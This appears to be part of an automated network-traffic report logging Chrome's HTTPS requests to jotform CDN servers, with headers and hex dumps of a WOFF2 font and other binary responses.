                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 02 02 b9 a2 39 c4 87 b7 ec 83 f0 4a 41 eb cc aa 9d 93 fb a9 a8 28 6b 25 5b 64 54 89 7c ce 33 17 01 2a 12 ab fc 50 a8 ef eb f4 63 1a 08 63 b3 1c 46 34 1e 18 ae b7 a8 50 45 5f 17 43 6f 40 df 12 a2 0b 4e fc a6 45 f1 b9 f1 8f b3 da d2 7a 61 10 5d 87 7f 58 0e 5c b9 f1 15 e7 90 b4 98 b5 a9 8a 52 8e 52 7d ad f4 53 18 68 c1 55 cb 28 0f e3 5d ae 64 34 90 0c bd ac 8d 7e 05 bc 62 79 5c 9e 24 30 e1 cc c4 d6 8e 42 1e 2f 10 3c 11 d2 18 61 24 2d 0a 7b cd e0 84 20 a4 23 bc 0c 7e 89 62 12 81 b1 f3 d5 c2 0b 5a ca bc c4 31 8a 0c 06 b2 16 94 60 71 24 c1 52 8b 33 74 36 0e 9e 50 cd d5 70 98 01 bc 04 7d 87 4c fd 83 35 70 18 d3 3e 80 9c d0 6b c4 16 48 e5 24 c1 86 e3 3e 10 95 db 7a 03 c6 96 3d 0a a5 de 6d fb e6 aa 31 4b 84 d8 12 3d b0 65 dc 95 c4 ef 1d 5c 2e 51 1a 7b 3e 59 31 35
                                                                                                                                                                                                                                            Data Ascii: 9JA(k%[dT|3*PccF4PE_Co@NEza]X\RR}ShU(]d4~by\$0B/<a$-{ #~bZ1`q$R3t6Pp}L5p>kH$>z=m1K=e\.Q{>Y15
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 99 4d 71 0b 0b 3c fd f4 64 00 b9 4b 1a 6b 9a 12 9f 65 62 40 c4 49 22 14 3a 83 62 a3 2e 93 4b fe 04 b4 57 07 40 52 4d 2d 82 0a 9e 1c 3d 69 f2 9f de 3e b4 16 10 11 a3 00 33 1f 27 98 87 31 ee 1c 8f 1f b1 96 d4 0b a2 8a e0 77 5a f2 fa fe 22 d4 71 8b dc 73 94 33 68 87 fc b9 08 df a1 43 c9 1b 53 6b f9 78 41 e8 25 2a 9a cf d6 3a aa 3e 8d 3c 44 0c 88 fd 3c 98 20 c1 9f 16 85 e9 59 38 f2 fd 1a e6 7d 4f 8e 95 c4 de 1e da 6f 27 97 9b 35 75 b6 e6 4c 72 cb c3 39 9c e5 ce fa 23 07 b6 a3 c7 47 29 36 13 7b 98 63 8f 71 d1 35 b8 f0 8c 3a 06 7c 92 b2 d6 e8 45 06 12 e1 ec 77 84 c8 76 e3 8a 44 98 f3 3f 8a 4b 61 4c d8 0e be 57 10 81 15 71 de d3 83 47 0e 1e e5 c9 82 f0 bc 3c 64 ff 6c 8e 33 f9 cb db 41 73 12 0e 2f f6 0e 13 71 13 2e 9d 93 60 f4 ce d3 96 90 a3 9c e8 3c c5 c6 73 16
                                                                                                                                                                                                                                            Data Ascii: Mq<dKkeb@I":b.KW@RM-=i>3'1wZ"qs3hCSkxA%*:><D< Y8}Oo'5uLr9#G)6{cq5:|EwvD?KaLWqG<dl3As/q.`<s
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 86 52 42 13 40 9e 06 b5 16 95 b6 d0 9e 0e d2 39 d3 45 ba 49 0f fa 0c f4 41 7b 43 64 38 1f 8f 29 8c 2b 4d fc 60 1d f9 9c ed de c3 ee 1e fe 56 0d 57 f2 2f db 43 6d 14 5e cb 6a 2b 56 ad 75 9d 92 3e 18 b6 9d 73 db 35 63 21 37 f7 dc f6 ba ab 72 df 43 8f 3d f5 dc 8b bc aa bc ce db c8 7b b5 8f 9b 36 6d d7 2e 55 fb 0e 9d 38 77 e9 ba 6e ed bb f7 e8 b9 03 74 a0 02 09 3c 23 30 ab d4 ea 09 6e 5e fe 31 aa 0c e7 45 20 13 ec 25 ec a2 a8 6d 87 5b b2 d2 24 fb e4 19 65 4f d2 aa aa ac ae f9 7a 6d a2 57 45 2a cf 6e 2b fd 99 81 19 66 d4 cb 18 13 53 33 bf c6 73 ea 4b aa cb 2a 5e cc 2d 2c ad da fa 6b 6c 97 51 43 e6 e7 1d 6f 47 ff 0e f7 bd c6 80 be 6c b5 fc ad 4f 4e b9 52 a9 54 b7 e7 7a 20 8e 0b 8d 22 4d d2 bc 6c 91 6b 15 6b cb d2 89 ae ea 06 f4 a4 b7 4a 5f e8 37 60 70 39 84 19
                                                                                                                                                                                                                                            Data Ascii: RB@9EIA{Cd8)+M`VW/Cm^j+Vu>s5c!7rC={6m.U8wnt<#0n^1E %m[$eOzmWE*n+fS3sK*^-,klQCoGlONRTz "MlkkJ_7`p9
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: c5 d7 b7 b6 f9 20 62 26 9e 64 d2 e1 23 47 8d 1e 33 76 dc f8 09 53 88 87 64 22 d6 97 7c a4 c0 27 29 57 39 d7 1c 36 af 62 01 dd 33 2a 31 6e 8b 5c 8a 65 79 a8 42 43 c7 c0 34 53 b3 b4 39 f3 16 02 9d 95 ce 96 a1 6c 38 07 17 8f 53 3e 01 a1 f6 ec 99 4e f5 6c 5a d1 33 c6 b2 c7 06 07 17 0f df 69 94 15 26 09 77 2f c2 36 32 3a 5b ca 6c fd 54 73 b5 d4 a5 a1 a9 15 b5 4e a7 77 e7 4d bb 77 3f 33 87 cf 13 88 a4 5b 35 e7 b7 5e 76 71 64 df 33 2a 21 18 03 94 2c 85 1c b9 f2 14 28 54 ac 44 a9 32 15 aa be 10 e9 40 0d 25 e0 69 34 1b e8 73 b5 a8 16 b5 21 9e 18 b5 47 2d 0d b1 a7 28 8a a2 26 d5 94 c2 79 17 5c 74 c9 65 57 5c 75 cd f5 9a a5 cc 99 b7 d0 21 9f 63 65 5d 87 30 10 23 e0 58 c8 3a d9 c4 b6 5d fb 0e 1d bb e1 96 3b ee 79 e0 91 27 79 76 e6 a5 37 de b5 0f cf b6 81 2d 3b f6 1c
                                                                                                                                                                                                                                            Data Ascii: b&d#G3vSd"|')W96b3*1n\eyBC4S9l8S>NlZ3i&w/62:[lTsNwMw?3[5^vqd3*!,(TD2@%i4s!G-(&y\teW\u!ce]0#X:];y'yv7-;
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 98 71 13 dc 35 59 92 8f 3e b7 a9 cd 14 ed ec 11 67 9f b9 2b 12 9b b7 12 92 a4 73 51 c7 77 06 be 67 bd c8 5d f5 fe d0 20 d2 18 69 42 b3 d6 b4 ed 97 ed 6a 1d 03 6c 91 c8 0d 37 fc 31 99 7e 03 06 0d 9f 9e 70 d5 a4 13 18 1d bf 39 c3 cd c2 73 42 22 62 12 52 32 f2 fe af 9a e2 2c 4a 51 51 d3 44 8b a5 2c e7 59 71 ab d6 ba 5e c4 04 6b ec 70 72 f3 da b0 65 c7 9e 03 47 4e 9c f1 0b 0a 7f fd 4d 91 c7 6a cf 87 c7 37 ef 7a 91 57 7b 7f ed 86 b7 96 f7 d6 3e 6e da b4 5d bb dc 68 df 49 69 f8 a3 d6 2a 54 9a b4 10 21 a3 f4 26 b7 cc 58 b3 9b 47 e1 7d d0 d5 c2 a8 30 9d 70 10 48 e3 a4 ba ae 4e bd e5 87 93 3e 9d f5 6b 5f 9f 13 4d ea 1e 75 71 2c 42 09 1d 66 7d 42 3e 69 4f 92 92 96 91 95 93 57 50 ac 92 1b 97 5b 65 24 3b 88 27 bf 17 c9 94 47 2a e9 d5 38 0a a1 82 86 8e 81 69 86 8d 83
                                                                                                                                                                                                                                            Data Ascii: q5Y>g+sQwg] iBjl71~p9sB"bR2,JQQD,Yq^kpreGNMj7zW{>n]hIi*T!&XG}0pHN>k_Muq,Bf}B>iOWP[e$;'G*8i
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 64 e2 4a 5a d3 c8 e5 d8 63 37 8a d3 af 5d 45 ea f2 6a 45 dd a3 7e a1 4d 41 33 57 a2 fd 75 83 e2 80 d1 f5 bb 18 85 ef 21 c6 3d aa e6 ee e7 89 91 67 d7 3c 63 2f 26 6a ab 0e a6 d6 ae ca 52 f9 21 f0 ce 87 ba 56 f0 bd 9f 38 ab da e6 f0 21 69 3c 36 56 fe 32 ea 54 13 08 f2 49 b1 6c 30 d8 1f 77 61 df e1 ba 61 82 b8 cf 2f dc 33 ae 90 2f 70 87 bb 7c 27 81 30 8f 1b 67 46 cd f8 3c cc 63 11 b7 33 69 41 2a ae af c2 0a dc 7b 9d e3 83 b3 8d 4c 2a e4 7c 8f 55 3d a9 99 c6 c8 93 f1 a9 4b 0c f8 54 7d b4 73 71 2c cd fc 85 4d 10 b3 a3 48 54 de fd b6 ee ae 71 04 4a 1d af 5c 09 ec ce 01 a3 5b e6 0b d9 27 ad 38 81 63 c7 f9 5d 47 6a 4e 39 98 c4 90 34 05 03 67 53 88 cd 68 8f f1 d4 bb 76 ec ae 42 e1 23 38 24 d8 f1 8c b9 37 75 30 72 c0 37 95 8c 7a e0 6d 49 8a e0 07 a9 e8 c3 f8 a5 7f
                                                                                                                                                                                                                                            Data Ascii: dJZc7]EjE~MA3Wu!=g<c/&jR!V8!i<6V2TIl0waa/3/p|'0gF<c3iA*{L*|U=KT}sq,MHTqJ\['8c]GjN94gShvB#8$7u0r7zmI
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 41 ec 4b 5c 28 52 b7 c4 85 21 cd 4b 9c 16 69 5b a2 f4 48 cf 1a e6 92 19 af 00 13 4b eb 36 40 ff 0f ae c7 9b e3 8c 42 cd 8f 91 0d 49 89 52 35 da 58 43 7d ea e9 70 79 83 0c 3e da e6 b3 1b 25 d4 47 30 14 21 81 14 4a b0 80 0a 8c 61 0e 19 2c 61 05 6b d8 c0 16 76 b0 87 32 e4 ce 12 13 26 68 17 06 06 39 ed f8 c9 15 3c 30 68 fe 69 e9 4b 52 ac 61 34 8f 31 20 60 e4 34 0e 66 c3 12 38 06 7f c0 24 4a a5 1c 6c c3 63 78 8f 7a e9 19 f7 b0 3f 33 3e c6 43 42 20 78 72 35 5f 42 4b b8 77 7b d7 4a dc dc 6b 96 de 80 5f 04 9f 1e 53 38 16 2f 62 89 3b ab 2f 62 6f 0d 0c 8d 8c 4d 4c cd 2d 40 0d 86 61 14 8c c0 18 18 0b e3 60 3c 4c 80 89 30 09 26 c3 91 8c 4c 7c 35 ca 35 4d 50 83 c9 e4 a6 98 6a 1a 05 33 0b 2b 1b 3b 07 27 17 f7 1b c0 fe 41 f0 c9 93 3f c3 8c 33 cd 8c 26 0f 5d b0 58 2a 6a
                                                                                                                                                                                                                                            Data Ascii: AK\(R!Ki[HK6@BIR5XC}py>%G0!Ja,akv2&h9<0hiKRa41 `4f8$Jlcxz?3>CB xr5_BKw{Jk_S8/b;/boML-@a`<L0&L|55MPj3+;'A?3&]X*j


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            6192.168.2.1749705172.67.7.1074435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC580OUTGET /fonts/circular/fonts/Circular-Medium.woff2 HTTP/1.1
                                                                                                                                                                                                                                            Host: cdn.jotfor.ms
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            Origin: https://eu.jotform.com
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: font
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:35:55 GMT
                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            last-modified: Fri, 17 May 2024 07:14:50 GMT
                                                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                                                            expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                                                                                                            Cache-Control: public, max-age=315360000
                                                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                                                                            CF-Cache-Status: REVALIDATED
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb5b28cec0cae-EWR
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC961INData Raw: 37 64 64 33 0d 0a 77 4f 46 32 00 01 00 00 00 01 18 c4 00 12 00 00 00 03 7f 4c 00 01 16 82 00 03 00 00 00 01 16 ec 00 00 01 d8 00 00 04 a1 00 00 00 00 00 00 00 00 1b 81 ce 0e 1c a5 68 14 85 77 06 60 00 89 0a 08 56 09 82 73 11 10 0a 89 85 74 88 ac 30 12 81 f9 38 01 36 02 24 03 97 4c 0b 97 50 00 04 20 05 8c 0a 07 b5 01 0c 84 11 5b 79 45 93 0e fd 4f c6 ee 9e df 6d a2 aa 0a 55 00 94 9e 62 92 7c 87 79 6f a6 dc 8e 14 78 ec 7e 18 95 dc 36 06 bd bf 30 e2 7e 74 44 dc f6 09 6a 44 e9 ce 50 a1 37 9f af 8e 96 fd ff ff ff ff ff ff ff cb 92 1f 22 e7 bf bb a4 ef 2e 49 1b 45 81 96 c2 7c b6 6d fb 1b a8 99 9b 48 44 f6 ec 85 68 2d a5 d2 75 75 51 50 7a e9 5d 4a 15 cb 3e d7 52 fa 55 41 2d 6b b5 ed 07 6a 1b 2c d7 0b e9 5b b9 13 66 7b 2d 0b 07 85 c7 db d4 01 83 d8 26 73 ca c3 06
                                                                                                                                                                                                                                            Data Ascii: 7dd3wOF2Lhw`Vst086$LP [yEOmUb|yox~60~tDjDP7".IE|mHDh-uuQPz]J>RUA-kj,[f{-&s
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: a8 33 ff 3f 2c c3 5f f6 3f bd f9 8f 7f 9a ff b2 10 96 e1 ee 0a 9c 96 73 81 a3 b4 8d 43 70 71 cc 91 1d c9 92 41 96 25 39 8e 5d 98 7f 74 6a 7f 48 9b 21 04 c2 48 36 96 09 16 58 38 29 64 60 c7 64 c8 c9 46 1d a2 af c6 0d ea f9 41 87 d3 33 1d 70 c3 be 98 0e b8 61 f7 42 07 64 e0 bb 90 fa c1 0d 92 54 37 b8 bd 06 4f 6f 07 e4 3b b0 7f 82 cd c1 80 35 29 68 a9 b2 02 7b 65 a9 56 6c e2 5f 70 a1 88 8b 6d a0 4f 3f 93 c8 87 c1 c3 71 40 91 c7 b0 77 d2 d1 9c b6 03 0a a0 12 07 f4 12 92 18 3f 76 40 f0 df 9c 28 3e 8f cf 71 2d 59 28 a1 1b 63 94 09 37 61 67 dc 84 91 93 b9 1c b2 d9 f7 27 d6 5d a0 04 cf 48 02 44 a1 2d de 77 f2 55 e7 f9 36 b5 db 6a 4c 0e b6 ef fa ed ba 91 31 21 fa e0 f2 85 58 14 8f 7d fc cc 5a ff 9b e1 15 c7 a2 57 44 0f 66 88 c6 0e 8d 09 71 99 58 33 2a da 80 00 0a
                                                                                                                                                                                                                                            Data Ascii: 3?,_?sCpqA%9]tjH!H6X8)d`dFA3paBdT7Oo;5)h{eVl_pmO?q@w?v@(>q-Y(c7ag']HD-wU6jL1!X}ZWDfqX3*
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 04 82 dd 21 0d c2 36 f7 7e 22 44 d0 91 90 e1 31 9c 36 d2 74 de c9 7b be a2 11 6d c4 b0 03 02 2c af 3f fe a6 1d ec ef ec 77 39 db 89 55 68 0b 54 28 10 79 9e 64 fd df 9f eb ff 27 7a bf ea fb 34 a7 d5 ab 0e 20 08 48 09 25 84 a4 ef 9d 38 eb 41 89 38 d5 bd 9c 02 2a f2 9c b6 a3 0c 00 ac 7c d3 37 f5 0c 73 2a a9 1a 24 a5 da 60 df ca 27 7d 60 05 90 b0 84 e1 71 89 a4 29 fb e3 67 d7 ef 6d 6a ef 43 2a 48 70 2a 4d 54 37 e1 56 e8 49 f6 70 f7 ce b8 35 80 9d 6d 8b 06 f0 ad a7 bb 68 44 7f f6 de cb 91 19 14 a0 9f 02 ac ec e1 af bf 9b 03 d7 9b ca 08 f8 dc b4 47 20 e8 f6 71 07 e6 3e 38 ee 41 e4 a3 cb 16 24 00 fd 14 88 0f d9 0b 84 83 f1 08 2e 24 37 8a 27 c3 2d 11 cd 4b f0 9b ff 74 76 06 28 3d 5e 8b ae 4c cc 4a 03 55 cb 11 25 80 00 27 5b e2 96 13 c1 fc b5 88 43 22 71 a0 a7 58
                                                                                                                                                                                                                                            Data Ascii: !6~"D16t{m,?w9UhT(yd'z4 H%8A8*|7s*$`'}`q)gmjC*Hp*MT7VIp5mhDG q>8A$.$7'-Ktv(=^LJU%'[C"qX
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 44 78 05 10 22 c2 63 47 28 90 42 ac a6 c2 c3 34 38 2d 33 75 65 6a d8 b9 f1 e9 51 18 02 0b 8b a0 43 82 28 77 ec ea 74 64 19 52 34 cb 7a 16 6d 34 67 6e 8c 25 9f a4 6a 8a f9 d1 0c 1b b1 a4 aa 91 32 29 17 94 87 92 1e a2 f1 8f a7 e5 a6 2e 5d 63 5f 0d a0 1b 84 a7 27 61 48 99 49 f6 a4 7d 9e 7f 64 61 ed 67 2e de 89 cc 2d 2a 5a 02 36 c9 41 2c 88 7e 0d 52 4a 69 a9 09 12 e4 52 ec 5c 9c d6 b8 25 78 c5 f8 b9 04 61 c2 00 51 94 49 68 cd 10 61 91 bd de 55 35 16 2d 47 15 ea 7e 36 3e 2b b1 59 64 8c 88 c5 b9 5a 45 17 94 10 2a 31 12 d6 ba e5 25 29 73 20 85 78 d5 f6 59 6b 19 22 4e 26 11 bb cb aa 93 f7 8b f0 b9 98 ff a6 4e 4c 4d b5 82 fb a2 34 46 2d 21 09 36 68 ba 2e bf 8c d6 be 12 8a b4 a9 43 c5 0c 81 fc 6a 89 0c 99 93 f6 92 95 f5 21 b3 2e 7e 69 52 44 7b 63 78 61 25 76 9c 18
                                                                                                                                                                                                                                            Data Ascii: Dx"cG(B48-3uejQC(wtdR4zm4gn%j2).]c_'aHI}dag.-*Z6A,~RJiR\%xaQIhaU5-G~6>+YdZE*1%)s xYk"N&NLM4F-!6h.Cj!.~iRD{cxa%v
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: a9 7b d2 b8 ff ef e9 99 31 f4 22 31 46 3c 93 b4 49 3b 48 6e 6f a2 c8 58 58 57 33 17 e7 44 66 15 a5 6f 8d 69 53 42 76 89 d1 02 f1 89 63 0a cd 81 44 03 a2 5b 8a ac 00 78 85 4b 8d b5 a4 e3 b4 86 73 0b f1 62 1c 9b 34 79 a9 e1 f1 d9 d5 2b 3a b7 c4 16 25 e5 95 5c c6 b3 a4 2c 6b 2d 91 7a c5 11 3d 41 a5 e7 16 63 d8 44 4f b1 3a 7c b8 d9 42 03 86 f5 38 1b 83 28 2d d8 58 ee 7f 8d 82 5d 82 d3 84 90 00 13 74 3a ab c2 9b cd 3f be 10 65 7d fc 16 48 15 00 95 3e e4 33 1b 69 ae 31 bb 8e 41 fb 72 b0 47 5c 13 ff 70 45 e7 81 68 11 3c 76 f5 67 6a 68 45 b9 75 e3 6c 76 f0 5b d1 f3 88 01 bb 13 53 73 d6 3f fa 28 61 53 4f 06 7c e2 39 c8 91 dd 69 58 2f 19 c6 19 de 66 17 af 34 f4 10 02 f2 74 fb b0 89 aa 51 05 d4 8d 9f d1 c1 2c 9a 7a 38 c5 27 8e 8b 87 58 d1 45 42 98 04 0d 8b 15 19 eb
                                                                                                                                                                                                                                            Data Ascii: {1"1F<I;HnoXXW3DfoiSBvcD[xKsb4y+:%\,k-z=AcDO:|B8(-X]t:?e}H>3i1ArG\pEh<vgjhEulv[Ss?(aSO|9iX/f4tQ,z8'XEB
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: ba d2 af 21 d2 b8 96 44 2b 6b 9b b6 bd 34 23 99 c5 e1 09 25 52 96 64 64 e5 e4 15 14 95 94 55 aa ca ba a6 5e 3b e2 bd 83 63 3b 3d e2 00 e0 04 61 d7 cc bc 2d 1e b1 1f 7e e6 cc ae 49 9b 8e bc 6e ff 01 dc 9f 7b 07 f0 47 f8 47 08 ba da 1b 19 4d f4 99 8f cd dd 16 97 26 18 27 7d 35 f2 7a 0f a1 50 28 fc ea d0 7b 81 02 3e b9 71 c8 9e c8 89 22 28 a9 a8 83 d4 30 c9 39 cd 19 37 4e 84 de 4a b2 c4 c9 d1 e0 d8 b7 95 da a0 c8 50 25 c5 d6 1c 5b 15 4a 95 56 a3 96 80 28 92 7a dc 20 d7 a8 d0 f4 63 3a f1 8c 77 cf 8f fb fc 14 7e f6 0b 5f 75 2b f4 ce 98 5d 9d 0b e9 fc 2e 7f fa db bf 79 20 ff 7b d8 9e ec ba 76 eb de 93 17 6f 3e d6 3a 9b f4 b6 19 92 91 89 f9 14 90 35 7c 0a 29 9a 4e a4 97 58 48 f8 9a 49 bb ba c1 89 5d 52 32 6b 5a fd 74 42 ef 4b 07 92 86 72 91 16 8d 15 2d f7 59 c9
                                                                                                                                                                                                                                            Data Ascii: !D+k4#%RddU^;c;=a-~In{GGM&'}5zP({>q"(097NJP%[JV(z c:w~_u+].y {vo>:5|)NXHI]R2kZtBKr-Y
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: f7 ea fa 7f 80 42 45 02 ca 54 a8 54 a5 5a 8d 5a 23 d5 b9 6f cd 83 db 7f 0f 2e 40 a0 53 20 2b fa 4c 19 a1 5e 9d cb 25 4d 80 2b 6b b4 a2 a3 67 60 d4 52 ad 84 36 ed 3a aa db 52 6f 65 51 fd 06 0d 5b b2 62 cd c6 78 8f 08 40 83 20 b0 58 88 0d 0e 2e 1e be ed 20 52 c8 32 3a a0 8d 4e da 73 ba d2 cf b8 fa d4 b7 76 3f 5c 9a 41 67 71 78 c2 c3 b6 e3 fb 23 9a f6 cf e0 f6 81 d5 fb 39 8d 0f 7c a8 c0 47 3e f6 89 4f 7d a6 50 f1 bd 4a 9d 51 26 43 31 43 65 80 9d f7 af 54 d7 41 37 12 7d a6 5e ae 61 cc ff eb 47 a1 b6 5f b5 71 4d ae bb e1 a6 5b 6e bb e3 ae 7b d5 2a d3 a6 5d 47 47 9c 77 bf ea dd 22 bd fc 40 f0 cd a8 32 2e 93 a6 cc 98 b3 60 cb 8e df fc e1 2f ff f8 af ef c9 3c c2 53 cf db cb 63 67 b8 70 e5 c6 9d 47 cf 5e bd bf 5f e7 4c 58 1e ce 3c 38 c3 12 1b 1c 5c 3c 7c 77 07 cc
                                                                                                                                                                                                                                            Data Ascii: BETTZZ#o.@S +L^%M+kg`R6:RoeQ[bx@ X. R2:Nsv?\Agqx#9|G>O}PJQ&C1CeTA7}^aG_qM[n{*]GGw"@2.`/<ScgpG^_LX<8\<|w
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: b2 e2 d4 f7 1c 31 76 94 fb 91 7c 40 77 1f 03 c1 b4 83 65 17 3b 71 c3 5b 53 a5 b9 fa 18 44 45 c5 ce e4 88 d4 c5 f6 48 99 ec 64 d9 63 71 9f 55 1c 9c e5 b2 03 e5 89 af 93 80 13 94 90 b0 68 c5 54 c4 75 ea 9a 7b 08 ee e6 be 0c d5 67 c7 80 a1 1a b3 6b 22 b9 27 d3 98 35 5f cb 76 ad 5a b7 39 6f 1f 67 dc 7c f0 38 eb 89 8a 67 79 a1 f6 6a d7 b9 cb ba 56 e9 d6 bd a7 02 ed 04 43 c9 f2 b2 e6 8d 92 db 4b 1d eb 13 3b 9c dc bc fc 45 b9 1f 13 ae 1f a1 d3 27 7a 4d b5 fd eb a4 1d 32 a1 7f 62 48 fa 42 a2 2a 63 f7 ac 9c bc 82 a2 92 b2 4a 55 55 ae b5 fa 08 14 c4 46 ec 24 04 39 53 44 2f 11 bb 42 b4 d0 d1 33 30 6a 91 d5 6f d0 b0 25 2b d6 6c 8c f3 48 00 3b 08 02 ab 4f 71 0a 2a 9a b0 6b e3 df 36 a3 e3 ac 70 f8 26 c4 9d 0f 0a 1a 63 82 d8 21 00 48 1c 29 9c 0f c2 87 31 d0 b5 0c 48 9a
                                                                                                                                                                                                                                            Data Ascii: 1v|@we;q[SDEHdcqUhTu{gk"'5_vZ9og|8gyjVCK;E'zM2bHB*cJUUF$9SD/B30jo%+lH;Oq*k6p&c!H)1H
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 65 71 eb 21 05 3e 91 33 96 67 64 1b 36 34 c7 4b 2a d2 74 36 6f 07 fe 47 8c 89 ff 29 91 b2 25 c3 10 c9 02 0a 03 43 47 63 3f fd 2f 7d 21 41 9e 25 7a 1a ce de ab 57 86 20 cf 7e ee 66 3c f1 25 f8 2b 08 86 ac 93 9b 3c 97 2c a4 9b 08 a0 2e 14 1a ed cc 27 7f 5d 1f 4f 85 f2 df 2a dd 60 a3 8f ae 5b 69 f0 0a dd ad 4e a7 db 75 6f fc d9 e0 a9 10 d1 6e 11 ec ce 98 2e d7 e7 d2 75 d4 2e 95 68 5a 1c 8a 72 b3 ae f7 0e 1f 16 dc 18 d4 47 2d a3 ee fd da 82 b7 18 6f 04 de 36 44 47 bd 49 e2 29 d8 0c ee 64 49 62 af aa 9a eb 05 b4 0d f6 4d 40 f6 88 6c 55 25 cb e7 d9 8c f1 4b 39 35 d6 4d e9 15 43 59 92 73 c7 51 97 90 1b 78 9b fa 4b 4b 4e 4a 75 50 26 2f 53 7d 96 e7 c7 9a 35 c2 9d be 48 8a e5 bf 7b 0a 33 56 17 35 8b d8 da 4f 29 fa a8 63 57 e5 2b 32 af e0 06 77 91 ba 66 71 4b 7a e4
                                                                                                                                                                                                                                            Data Ascii: eq!>3gd64K*t6oG)%CGc?/}!A%zW ~f<%+<,.']O*`[iNuon.u.hZrG-o6DGI)dIbM@lU%K95MCYsQxKKNJuP&/S}5H{3V5O)cW+2wfqKz
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: a1 52 12 99 d2 48 c1 e0 40 f4 1d 37 91 d5 07 99 8d dc 56 a1 f4 dd 0f 3f 81 c5 6a b3 3b 9c 2e b7 c7 eb 93 2d 07 4d 9b 5c 0a 01 1d ba 28 8d 32 5a 37 15 0b ab 7c 05 6c ec 1c 9c 5c d3 04 fb 03 82 97 8f 3f 63 a6 cc 59 b0 b8 b1 71 a8 69 68 e9 4c 00 81 21 50 18 1c 81 44 a1 31 58 1c 9e 4a a3 33 98 2c 36 87 cb e3 0b 84 22 b1 44 2a 93 2b 94 2a b5 46 ab d3 1b 8c 66 e6 16 96 56 d6 36 b6 76 f6 0e 8e 4e ce 14 cd b0 1c 2e 8f 2f 10 8a c4 12 a9 4c ae 50 aa d4 1a ad 4e 6f 30 8e 84 e3 d8 7e 71 e8 8a 82 70 22 b1 a9 d7 46 e6 7a 23 28 7c 09 2a bf de 69 02 cd 46 17 6c 01 5e 75 c9 66 4e 01 c2 56 3c 61 07 2b 68 4f 25 c5 84 29 3d a1 49 33 9b ac 58 19 47 07 1c e5 e6 26 08 2f b7 09 6f 77 09 1f 1d 84 af 2e 42 ae 87 f0 f3 4e e3 3f 3e 69 da 84 a4 80 99 c4 fb a7 97 13 0b 9c d5 58 0b da
                                                                                                                                                                                                                                            Data Ascii: RH@7V?j;.-M\(2Z7|l\?cYqihL!PD1XJ3,6"D*+*FfV6vN./LPNo0~qp"Fz#(|*iFl^ufNV<a+hO%)=I3XG&/ow.BN?>iX


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            7192.168.2.1749712172.67.7.1074435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC562OUTGET /s/vendor/static/pwacompat/2.0.11/pwacompat.min.js HTTP/1.1
                                                                                                                                                                                                                                            Host: cdn02.jotfor.ms
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: script
